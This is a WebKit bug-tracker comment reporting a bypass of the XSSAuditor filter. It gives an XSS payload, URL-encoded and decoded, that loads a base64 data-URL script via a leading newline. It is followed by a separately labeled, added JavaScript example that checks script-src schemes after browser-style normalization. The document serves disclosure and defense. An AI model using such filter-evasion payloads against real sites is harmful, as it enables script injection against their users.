[Webkit-unassigned] [Bug 29278] XSSAuditor bypasses from sla.ckers.org

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Fri Aug 6 10:03:54 PDT 2010


https://bugs.webkit.org/show_bug.cgi?id=29278





--- Comment #8 from Mario Heiderich <mario.heiderich at gmail.com>  2010-08-06 10:03:54 PST ---
I just tested again - it bypasses the filter with a regular closing script tag too

%22%3E%3Cscript%20src=%0adata:%01;base64,YWxlcnQoMSkNCg==%20%3E%3C/script%3E

"><script src=
data:;base64,YWxlcnQoMSkNCg== ></script>

The script execution is being blocked as soon as the %0A before data: is left out. Maybe that helps to locate the filter bug.

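An added example, not part of the original comment and not WebKit code: a scheme check on a script src value, done on the raw text and then after the normalization a browser applies. The HTML tokenizer skips whitespace before an unquoted attribute value, and the WHATWG URL parser strips leading and trailing C0 control characters and spaces and removes ASCII tabs and newlines, so a check on the raw reflected text can disagree with what the browser loads. All function names and the blocked-scheme list are assumptions made for the illustration.

```javascript
// Added example: function names and BLOCKED_SCHEMES are hypothetical.

// Naive check: looks for the scheme only at the very start of the raw value.
function naiveIsDataUrl(value) {
  return /^data:/i.test(value);
}

// Preprocess the value the way the WHATWG URL parser does:
// 1. strip leading/trailing C0 control characters and spaces (U+0000-U+0020),
// 2. remove every ASCII tab and newline anywhere in the string.
function normalizeUrlInput(value) {
  return value
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Returns the lower-cased scheme, or null when the value has no scheme
// (a relative URL).
function schemeOf(value) {
  const m = /^([a-z][a-z0-9+.\-]*):/i.exec(normalizeUrlInput(value));
  return m ? m[1].toLowerCase() : null;
}

// Schemes this illustrative policy refuses as a script source.
const BLOCKED_SCHEMES = new Set(["data", "javascript", "vbscript"]);

function isBlockedScriptSrc(value) {
  const scheme = schemeOf(value);
  return scheme !== null && BLOCKED_SCHEMES.has(scheme);
}

// The src value from the comment above, percent-decoded: a newline before
// "data:", a U+0001 after the colon, and a trailing space.
const reported = decodeURIComponent("%0adata:%01;base64,YWxlcnQoMSkNCg==%20");

console.log("naive check flags it:     ", naiveIsDataUrl(reported));
console.log("normalized check flags it:", isBlockedScriptSrc(reported));
console.log("scheme seen after normalization:", schemeOf(reported));
```
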